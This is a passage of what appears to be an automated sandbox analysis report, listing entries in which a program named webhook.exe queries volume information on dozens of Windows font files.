Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
